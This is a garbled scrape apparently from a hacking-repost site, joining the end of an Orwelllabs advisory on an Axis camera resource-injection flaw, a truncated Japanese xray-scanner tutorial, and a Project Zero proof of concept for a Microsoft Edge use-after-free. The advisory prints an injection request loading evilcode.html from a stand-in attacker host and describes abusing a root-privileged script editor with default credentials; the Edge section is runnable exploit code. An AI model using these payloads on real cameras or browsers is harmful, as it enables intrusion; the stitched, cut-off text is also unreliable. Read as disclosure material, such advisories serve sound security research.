GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
Connection: keep-alive

The server response can be seen below (with the clipping of the affected
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):


<table border="0" cellpadding="3" cellspacing="3">
 <tr>
  <td id="videoStreamTable">
   <script language="JavaScript">
    <!--
     video('http://www.3vilh0st.com/evilcode.html');
    // -->
   </script>
  </td>
 </tr>
</table>

[..SNIP..]

function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;

[..SNIP..]

var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');

[..SNIP..]

<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">

[..SNIP..]

// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)

[..SNIP..]


=================== view.shtml snips =====================

 447 function zoom(size)
 448 {
 449   var url = document.URL;
 450
 451   if (url.indexOf("?") == -1) {
 452     url += "F?size=" + size
 453   } else if (url.indexOf("size=") == -1) {
 454     url += "&size=" + size
 455   } else {
 456     var searchStr = "size=<!--#echo var="size"
option="encoding:javascript" -->"
 457     var replaceStr = "size=" + size
 458     var re = new RegExp(searchStr , "g")
 459     url = url.replace(re, replaceStr)
 460   }
 461
 462   document.location = url;
 463 }
 464
 465 var aNewImagePath;
 466
 467 function reloadPage()
 468 {
 469   document.location = aNewImagePath;
 470 }
 471

[ SNIP ]

 567     aNewImagePath = '/view/view.shtml?id=<!--#echo
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
escape(imagePath) + size;
 568     if (other != null)
 569       aNewImagePath += other;
 570 <!--#if expr="$ptzpresets = yes" -->
 571     /* append preset parameters so that preset postion is selected in
drop down list after reload */
 572     if (presetName != '')
 573       aNewImagePath += "&gotopresetname=" + escape(presetName);
 574     else if (gotopresetname != '')
 575       aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
 576
 577     if( newCamera != '')
 578       aNewImagePath += "&camera=" + escape(newCamera);



---*---
Some legitimate resources can be very interesting to cybercriminals with
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
there are some resources, like the "Open Script Editor". By this resource
the user can edit any file in the operation system with root privileges,
because everything (in the most part of IoT devices) runs with root
privileges, this is other dangerous point to keep in mind.

> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'

Well, one can say that this feature is restricted to the administrator of
the camera, and this would be true if customers were forced  to change the
default password during setup phase with a strong password policy, since
change "pass" to "pass123" does not solve the problem. The aggravating
factor is that there are thousands of products available on the internet,
running with default credentials.


Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was
fixed in firmware 5.60, but we identified that the problem still occurred
in 5.80.x versions of various product models. Check for updates on the
manufacturer's website.

About Open Script Editor,It was considered that in order to have access to
this feature, it is necessary to be authenticated as an admin, but if there
is no policy that forces the client to change the password during the
product setup (ease vs. security) and also requires a password complexity,
having an administrative credential to abuse the functionality is not
exactly an impediment (e.g: botnets that bring embedded in the code a
relation of default credentials for that type of device)


Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.


Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.


About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
HireHackking

1。 Xray

のインストールと構成

1。linux[root@instance-7q32v011 opt] #wget https://github.com/chaitin/xray/releases/download/0.21.8/xray_linux_amd64.zip 1049983-20210117111856886-1676485258.png2。ファイルを解凍します[root@instance-7q32v011 opt] #unzip xray_linux_amd64.zip 1049983-20210117111857526-57001381.png3。 Xray実行可能ファイルを実行して、証明書と構成ファイルを生成する

[root@instance-7q32v011 opt] 1049983-20210117111858790-1103549357.png 1049983-20210117111859338-661677427.png

2。サーバーソースの構成

1。ログイン:githubアカウントでウェブサイトにログインすると、sckey( "send message"ページ)1049983-20210117111900075-2087231931.jpg2を取得できます。バインド:「WeChat Push」をクリックし、QRコードをスキャンして1049983-20210117111900502-1524337923.png3と同時にバインディングを完了します。メッセージを送信:http://Sc.ftqq.com/sckey.sendにGet Requestを送信して、WeChatでメッセージを受信できます。そのようなGETリクエストを生成する場合:https://sc.ftqq.com/scu100930te4d1

HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043

I noticed that some javascript getters behave strangely.

My test code:

var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];

var f = document.createElement("iframe");

f.onload = () => {
    f.onload = null;

    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;

        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {

        }
    }

};

f.src = "https://abc.xyz/";
document.body.appendChild(f);

And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.

Tested on Microsoft Edge 38.14393.0.0.
-->

<!--

Microsoft Edge: Undefined behavior on some getters

I noticed that some javascript getters behave strangely.

My test code:

var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];

var f = document.createElement("iframe");

f.onload = () => {
    f.onload = null;

    for (var x in window) {
        if (whitelist.indexOf(x) != -1)
            continue;

        try {
            window.__lookupGetter__(x).call(f.contentWindow);
            log(x);
        } catch (e) {

        }
    }

};

f.src = "https://abc.xyz/";
document.body.appendChild(f);

And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.

Tested on Microsoft Edge 38.14393.0.0.

-->


<pre id="d">
</pre>
<body></body>

<script>

function log(txt) {
    var c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}

function main() {
    var f = document.createElement("iframe");
    
    f.onload = () => {
        f.onload = () => {
            var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
            var func_cons = status.constructor.constructor;

            var ff = func_cons("return 0x12345;");
            for (var i = 0; i < 0x100000; i++)
                ff();

            f.onload = () => {
                alert("get ready");
                ff();
            };

            f.src = "about:blank";
        };

        //a = f.contentWindow;
        f.src = "about:blank";
    };

    document.body.appendChild(f);
}

main();

</script>